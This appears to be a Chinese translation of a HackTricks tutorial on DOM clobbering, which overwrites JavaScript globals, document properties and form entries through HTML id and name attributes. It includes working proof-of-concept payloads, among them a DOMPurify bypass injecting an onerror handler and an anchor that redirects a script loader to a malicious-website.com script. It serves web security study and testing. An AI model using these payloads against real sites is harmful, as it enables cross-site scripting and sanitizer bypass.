从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) ! 你在网络安全公司 工作吗?想要看到你的公司在HackTricks上做广告 吗?或者想要获取PEASS的最新版本或下载HackTricks的PDF 吗?查看订阅计划 !
基础知识
可以使用HTML标签中的**id
和 name
属性在JS上下文中生成 全局变量**。
复制 < form id = x ></ form >
< script > console .log ( typeof document .x) //[object HTMLFormElement] </ script >
只有 某些元素可以使用name属性 来覆盖全局变量,它们是:embed
、form
、iframe
、image
、img
和object
。
有趣的是,当您使用form元素 来覆盖 一个变量时,您将获得元素本身的**toString
值: [object HTMLFormElement]
,但使用 anchor时, toString
将是锚点的 href
。因此,如果您使用 a
标签来覆盖,您可以在将其视为字符串时 控制该 值**:
复制 < a href = "controlled string" id = x ></ a >
< script >
console .log (x); //controlled string
</ script >
数组和属性
也可以篡改数组 和对象属性 :
复制 < a id = x >
< a id = x name = y href = controlled >
< script >
console .log (x[ 1 ]) //controlled
console .log ( x .y) //controlled
</ script >
要覆盖第三个属性 (例如 x.y.z),您需要使用一个**form
**:
复制 < form id = x name = y >< input id = z value = controlled ></ form >
< form id = x ></ form >
< script >
alert ( x . y . z .value) //controlled
</ script >
通过使用 iframes,覆盖更多属性 会变得更加复杂但仍然可能 :
复制 < iframe name = x srcdoc = "<a id=y href=controlled></a>" ></ iframe >
< style > @import 'https://google.com' ;</ style >
< script > alert ( x .y) //controlled </ script >
样式标签用于给iframe足够的时间来渲染。如果没有它,你会发现一个未定义的警报。
要深入破坏更多属性,可以使用带有HTML编码的iframe,如下所示:
复制 < iframe name = a srcdoc = "<iframe srcdoc='<iframe name=c srcdoc=<a/id=d&amp;#x20;name=e&amp;#x20;href=\controlled&amp;gt;<a&amp;#x20;id=d&amp;gt; name=d>' name=b>" ></ iframe >
< style > @import 'https://google.com' ;</ style >
< script >
alert ( a . b . c . d .e) //controlled
</ script >
绕过过滤器
如果一个过滤器正在通过类似 document.getElementByID('x').attributes
这样的方式循环 遍历节点的属性 ,你可以覆盖 属性**.attributes
并 破坏过滤器**。其他 DOM 属性如**tagName
、 nodeName
或 parentNode
等也是可以 覆盖**的。
复制 < form id = x ></ form >
< form id = y >
< input name = nodeName >
</ form >
< script >
console .log ( document .getElementById ( 'x' ).nodeName) //FORM
console .log ( document .getElementById ( 'y' ).nodeName) //[object HTMLInputElement]
</ script >
Clobbering window.someObject
在 JavaScript 中经常会发现:
复制 var someObject = window .someObject || {};
操纵页面上的HTML允许用DOM节点覆盖someObject
,可能引入安全漏洞。例如,您可以用指向恶意脚本的锚元素替换someObject
:
复制 < a id = someObject href = //malicious-website.com/malicious.js ></ a >
在一个易受攻击的代码中,例如:
复制 < script >
window . onload = function (){
let someObject = window .someObject || {};
let script = document .createElement ( 'script' );
script .src = someObject .url;
document . body .appendChild (script);
};
</ script >
这种方法利用脚本源来执行不需要的代码。
技巧 :DOMPurify
允许您使用 cid:
协议,该协议不会对双引号进行 URL 编码 。这意味着您可以注入一个编码的双引号,在运行时将被解码 。因此,注入类似于 <a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:"onerror=alert(1)//">
这样的内容将使 HTML 编码的 "
在运行时解码 并从属性值中逃逸 ,以创建 onerror
事件。
另一种技术使用了一个 form
元素。某些客户端库会检查新创建的表单元素的属性以进行清理。但是,通过在表单内添加一个带有 id=attributes
的 input
,您实际上覆盖了属性,阻止了消毒剂访问实际属性。
您可以在这篇 CTF 解密中找到这种类型的覆盖示例 。
覆盖文档对象
根据文档,可以使用 DOM 覆盖来覆盖文档对象的属性:
文档 接口支持命名属性 。文档 对象在任何时刻支持的属性名称包括以下内容,按照贡献它们的元素的树顺序 排列,忽略后续的重复,并且在相同元素同时贡献 id 属性和 name 属性时,来自 id 属性的值优先于来自 name 属性的值:
- 所有具有非空名称内容属性并且在文档树中具有文档作为根 的公开 embed 、form 、iframe 、img 和公开 object 元素的名称内容属性的值;
- 所有具有非空id 内容属性并且在文档树中具有文档作为根 的公开 object 元素的id 内容属性的值;
- 所有具有非空id 内容属性和非空名称内容属性的id 内容属性的值的img 元素,且在文档树中具有文档作为根 。
使用这种技术,您可以覆盖常用的值,如 document.cookie
、document.body
、document.children
,甚至文档接口中的方法,如 document.querySelector
。
复制 document .write ( "<img name=cookie />" )
document .cookie
< img name = "cookie" >
typeof(document.cookie)
'object'
//Something more sanitize friendly than a img tag
document.write("< form name =cookie><input id =toString></form>")
document.cookie
HTMLCollection(2) [img, form, cookie: img]
typeof(document.cookie)
'object
在元素被篡改后写入
对 document.getElementById()
和 document.querySelector()
的调用结果可以通过注入具有相同id属性的 <html>
或 <body>
标签来进行更改。以下是如何实现的:
复制 < div style = "display:none" id = "cdnDomain" class = "x" >test</ div >
< p >
< html id = "cdnDomain" class = "x" >clobbered</ html >
< script >
alert ( document .getElementById ( 'cdnDomain' ).innerText); // Clobbered
alert ( document .querySelector ( '.x' ).innerText); // Clobbered
</ script >
此外,通过使用样式来隐藏这些注入的HTML/body标签,可以防止innerText
中其他文本的干扰,从而增强攻击的效果:
复制 < div style = "display:none" id = "cdnDomain" >test</ div >
< p >existing text</ p >
< html id = "cdnDomain" >clobbered</ html >
< style >
p { display : none ;}
</ style >
< script >
alert ( document .getElementById ( 'cdnDomain' ).innerText); // Clobbered
</ script >
调查发现SVG可以有效地利用<body>
标签:
复制 < div style = "display:none" id = "cdnDomain" >example.com</ div >
< svg >< body id = "cdnDomain" >clobbered</ body ></ svg >
< script >
alert ( document .getElementById ( 'cdnDomain' ).innerText); // Clobbered
</ script >
要使HTML标签在Chrome和Firefox等浏览器中在SVG内起作用,需要使用<foreignobject>
标签:
复制 < div style = "display:none" id = "cdnDomain" >example.com</ div >
< svg >
< foreignobject >
< html id = "cdnDomain" >clobbered</ html >
</ foreignobject >
</ svg >
< script >
alert ( document .getElementById ( 'cdnDomain' ).innerText); // Clobbered
</ script >
Clobbering Forms
可以通过在某些标签中指定form
属性来向表单中添加新条目。您可以使用这种方法向表单中添加新值,甚至可以添加一个新的按钮来发送它(点击劫持或滥用一些.click()
JS代码):
复制 <!--Add a new attribute and a new button to send-->
< textarea form = id-other-form name = info >
";alert(1);//
</ textarea >
< button form = id-other-form type = "submit" formaction = "/edit" formmethod = "post" >
Click to send!
</ button >
参考资料
Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker.
从零开始学习AWS黑客技术 htARTE (HackTricks AWS Red Team Expert) ! 您在网络安全公司 工作吗? 您想看到您的公司在HackTricks中做广告 吗? 或者您想访问PEASS的最新版本或下载PDF格式的HackTricks 吗? 请查看订阅计划 !